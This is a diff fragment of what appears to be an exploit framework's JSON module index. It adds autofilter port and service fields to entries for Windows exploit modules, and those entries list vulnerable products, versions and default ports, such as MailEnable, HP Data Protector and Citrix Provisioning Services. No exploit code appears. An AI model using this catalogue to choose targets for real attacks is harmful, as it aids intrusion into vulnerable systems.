+110845,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MailEnable 2.35 Pro", "MailEnable 2.34 Pro" @@ -85357,6 +110886,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MailEnable 1.54 Pro Universal", "Windows XP Pro SP0/SP1 English", @@ -85393,6 +110928,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MailEnable 1.54 Pro Universal" ], @@ -85426,6 +110967,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MDaemon IMAP 8.0.3 Windows XP SP2" ], @@ -85461,6 +111008,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MDaemon Version 9.6.4" ], @@ -85494,6 +111047,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Server SP4 English", "Windows 2000 Pro SP1 English" @@ -85529,6 +111088,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP2 English" @@ -85562,6 +111127,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English", "Windows XP Pro SP0/SP1 English" @@ -85597,6 +111168,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP4 English", @@ -85634,6 +111211,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85665,6 +111248,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85698,6 +111287,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85732,6 +111327,12 @@ "platform": "Windows", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English" ], @@ -85766,6 +111367,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP1", "Windows 2000 SP0", @@ -85803,6 +111419,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Brute Force", "Windows 2000 -MS03-019", @@ -85840,6 +111471,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP0-SP3", "Windows 2000 07/22/02", @@ -85874,6 +111520,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "RSA WebAgent 5.2", "RSA WebAgent 5.3", @@ -85917,6 +111578,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Detection", "Windows 2000 RESKIT DLL [Windows 2000]", @@ -85953,6 +111629,12 @@ "platform": "Windows", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English", "Windows 2000 IMail 8.x" @@ -85988,6 +111670,12 @@ "platform": "Windows", "arch": "", "rport": 389, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal PGPcertd.exe" ], @@ -86023,6 +111711,12 @@ "platform": "Windows", "arch": "", "rport": 10203, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English", @@ -86062,6 +111756,12 @@ "platform": "Windows", "arch": "", "rport": 10202, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English", @@ -86104,6 +111804,12 @@ "platform": "Windows", "arch": "", "rport": 27000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Debug", "Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3", @@ -86140,6 +111846,12 @@ "platform": "Windows", "arch": "", "rport": 5093, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6", @@ -86179,6 +111891,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader X 10.1.4 / Windows 7 SP1" ], @@ -86212,6 +111930,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Agnitum Outpost Internet Security 8.1" ], @@ -86247,6 +111971,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 10 x64" ], @@ -86281,6 +112011,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86313,6 +112049,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86345,6 +112087,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86380,6 +112128,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -86413,6 +112167,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86448,6 +112208,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -86481,6 +112247,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86514,6 +112286,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86551,6 +112329,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86583,6 +112367,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86616,6 +112406,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86649,6 +112445,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -86681,6 +112483,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64 (<= 10)" ], @@ -86715,6 +112523,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -86753,6 +112567,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64", "Windows x86" @@ -86786,6 +112606,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -86819,6 +112645,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86854,6 +112686,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -86892,6 +112730,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -86926,6 +112770,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -86964,6 +112814,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2K SP4 - Windows 7 (x86)" ], @@ -86999,6 +112855,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Vista, 7, and 2008" ], @@ -87035,6 +112897,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP2 / SP3", @@ -87073,6 +112941,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87110,6 +112984,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP0/SP1" ], @@ -87149,6 +113029,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP0/SP1" ], @@ -87184,6 +113070,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 - 11" ], @@ -87219,6 +113111,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IE 8 - 11" ], @@ -87257,6 +113155,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87294,6 +113198,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Server 2003 SP2" ], @@ -87329,6 +113239,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Protected Mode (Windows 7) / 32 bits" ], @@ -87367,6 +113283,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87409,6 +113331,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 8.1 x64" ], @@ -87446,6 +113374,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP0/SP1" ], @@ -87479,6 +113413,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 SP1" ], @@ -87515,6 +113455,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87559,6 +113505,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3", @@ -87596,6 +113548,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 7 SP1" @@ -87631,6 +113589,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3" @@ -87668,6 +113632,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 8 / Windows 8.1 (x86 and x64)" ], @@ -87702,6 +113672,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -87734,6 +113710,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -87767,6 +113749,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -87799,6 +113787,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -87830,6 +113824,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -87862,6 +113862,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -87904,6 +113910,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -87936,6 +113948,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -87967,6 +113985,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -87998,6 +114022,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -88030,6 +114060,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -88061,6 +114097,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88093,6 +114135,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88126,6 +114174,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -88157,6 +114211,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88189,6 +114249,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -88222,6 +114288,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -88258,6 +114330,12 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)" ], @@ -88290,6 +114368,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7" ], @@ -88323,6 +114407,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -88355,6 +114445,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -88390,6 +114486,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Lotus Domino 7.0 on Windows 2003 SP1 English(NX)", @@ -88432,6 +114543,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lotus Domino 8.5 on Windows 2000 SP4", "Lotus Domino 8.5 on Windows Server 2003 SP0", @@ -88469,6 +114586,12 @@ "platform": "Windows", "arch": "x86", "rport": 1533, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lotus Sametime 7.5 on Windows Server 2000 SP4", "Lotus Sametime 7.5 on Windows Server 2003 SP1", @@ -88509,6 +114632,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" @@ -88543,6 +114678,12 @@ "platform": "Windows", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 English SP0-SP4", @@ -88579,6 +114720,12 @@ "platform": "Windows", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NIPrint3.EXE (TDS:0x3a045ff2)", "Windows XP SP3", @@ -88614,6 +114761,12 @@ "platform": "Windows", "arch": "", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SAPlpd 6.28.0.1 (SAP Release 6.40)" ], @@ -88647,6 +114800,12 @@ "platform": "Windows", "arch": "", "rport": 13500, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinComLPD 3.0.2.623" ], @@ -88679,6 +114838,12 @@ "platform": "Windows", "arch": "", "rport": 9256, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1" ], @@ -88715,6 +114880,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ActFax 5.01 / Windows XP SP3" ], @@ -88748,6 +114919,12 @@ "platform": "Windows", "arch": "", "rport": 705, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Helix Server v12 and v13 - master.exe" ], @@ -88783,6 +114960,12 @@ "platform": "Windows", "arch": "", "rport": 888, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ALLMediaServer 0.8 / Windows XP SP3 - English", "ALLMediaServer 0.8 / Windows 7 SP1 - English" @@ -88819,6 +115002,12 @@ "platform": "Windows", "arch": "", "rport": 402, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 (with tftp client available)" ], @@ -88853,6 +115042,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "QuickTime 7.3, QuickTime Player 7.3" ], @@ -88886,6 +115081,12 @@ "platform": "Windows", "arch": "", "rport": 623, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Asus Dpcroxy version 2.00.19 Universal" ], @@ -88924,6 +115125,12 @@ "platform": "Windows", "arch": "", "rport": 3217, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Avaya WinPMD 3.8.2 / Windows XP SP3", "Avaya WinPMD 3.8.2 / Windows 2003 SP2" @@ -88958,6 +115165,12 @@ "platform": "Windows", "arch": "", "rport": 4659, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Professional SP3" ], @@ -88992,6 +115205,12 @@ "platform": "Windows", "arch": "", "rport": 20031, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP4 English", @@ -89030,6 +115249,12 @@ "platform": "Windows", "arch": "", "rport": 16102, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BCAAA Version 5.4.6.1.54128" ], @@ -89063,6 +115288,12 @@ "platform": "Windows", "arch": "", "rport": 6080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro All English", "Windows XP Pro SP0/SP1 English" @@ -89098,6 +115329,12 @@ "platform": "Windows", "arch": "", "rport": 6660, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt 2.5 Universal", "Windows 2000 Pro All English", @@ -89135,6 +115372,12 @@ "platform": "Windows", "arch": "", "rport": 6661, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt Server 2.97 SP7" ], @@ -89170,6 +115413,12 @@ "platform": "Windows", "arch": "", "rport": 6661, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt Server 2.97 SP7 / Windows XP SP3", "BigAnt Server 2.97 SP7 / Windows 2003 SP2" @@ -89207,6 +115456,12 @@ "platform": "Windows", "arch": "", "rport": 6660, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "BigAnt 2.52 Universal" ], @@ -89240,6 +115495,12 @@ "platform": "Windows", "arch": "", "rport": 11000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP2 Italian", @@ -89277,6 +115538,12 @@ "platform": "Windows", "arch": "", "rport": 19810, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Bopup Communications Server 3.2.26.5460" ], @@ -89310,6 +115577,12 @@ "platform": "Windows", "arch": "", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English All / Borland InterBase 2007" ], @@ -89343,6 +115616,21 @@ "platform": "Windows", "arch": "", "rport": 3057, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2000 SP4 English", "Windows 2003 SP0 English" @@ -89378,6 +115666,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista" ], @@ -89413,6 +115707,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89447,6 +115747,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89481,6 +115787,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89517,6 +115829,12 @@ "platform": "Windows", "arch": "", "rport": 6905, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Citrix Provisioning Services 5.6 SP1" ], @@ -89550,6 +115868,12 @@ "platform": "Windows", "arch": "", "rport": 8888, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CloudMe Sync v1.10.9" ], @@ -89582,6 +115906,12 @@ "platform": "Windows", "arch": "", "rport": 8400, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Commvault Communications Service (cvd) / Microsoft Windows 7 and higher" ], @@ -89613,6 +115943,12 @@ "platform": "Windows", "arch": "", "rport": 9124, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Disk Savvy Enterprise v10.4.18" ], @@ -89645,6 +115981,12 @@ "platform": "Windows", "arch": "", "rport": 1100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "doubletake 4.5.0", "doubletake 4.4.2", @@ -89683,6 +116025,12 @@ "platform": "Windows", "arch": "", "rport": 10616, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "EnterpriseSecurityAnalyzerv21 Universal", @@ -89738,6 +116086,12 @@ "platform": "Windows", "arch": "", "rport": 10628, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 SP4 English", @@ -89777,6 +116131,12 @@ "platform": "Windows", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Enterasys NetSight 4.0.1.34 / Windows XP SP3", "Enterasys NetSight 4.0.1.34 / Windows 2003 SP2" @@ -89814,6 +116174,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win XP SP3 English", "Win XP SP2 English" @@ -89847,6 +116213,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows FB 2.5.2.26539", "Windows FB 2.5.1.26351", @@ -89886,6 +116258,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", @@ -89923,6 +116301,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", @@ -89960,6 +116344,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Firebird WI-V1.5.3.4870 WI-V1.5.4.4910", @@ -89993,6 +116383,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Gh0st Beta 3.6" ], @@ -90029,6 +116425,12 @@ "platform": "Windows", "arch": "", "rport": 10008, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1", "GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1" @@ -90066,6 +116468,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 8.10 / Windows" ], @@ -90101,6 +116509,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "HP Data Protector 6.20 build 370 / Windows XP SP3", @@ -90139,6 +116553,12 @@ "platform": "Windows", "arch": "", "rport": 3817, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3" ], @@ -90172,6 +116592,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -90208,6 +116634,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.20 build 370 / VBScript CMDStager", "HP Data Protector 6.20 build 370 / Powershell" @@ -90241,6 +116673,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.10/6.11/6.20 / Windows" ], @@ -90276,6 +116714,12 @@ "platform": "Windows", "arch": "", "rport": 3817, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector Express 6.0.00.11974 / Windows XP SP3", "HP Data Protector Express 5.0.00.59287 / Windows XP SP3" @@ -90313,6 +116757,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.20 build 370 / Windows 2003 SP2" ], @@ -90350,6 +116800,12 @@ "platform": "Windows", "arch": "", "rport": 2810, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -90387,6 +116843,12 @@ "platform": "Windows", "arch": "", "rport": 2810, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -90424,6 +116886,12 @@ "platform": "Windows", "arch": "", "rport": 1811, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2" ], @@ -90458,6 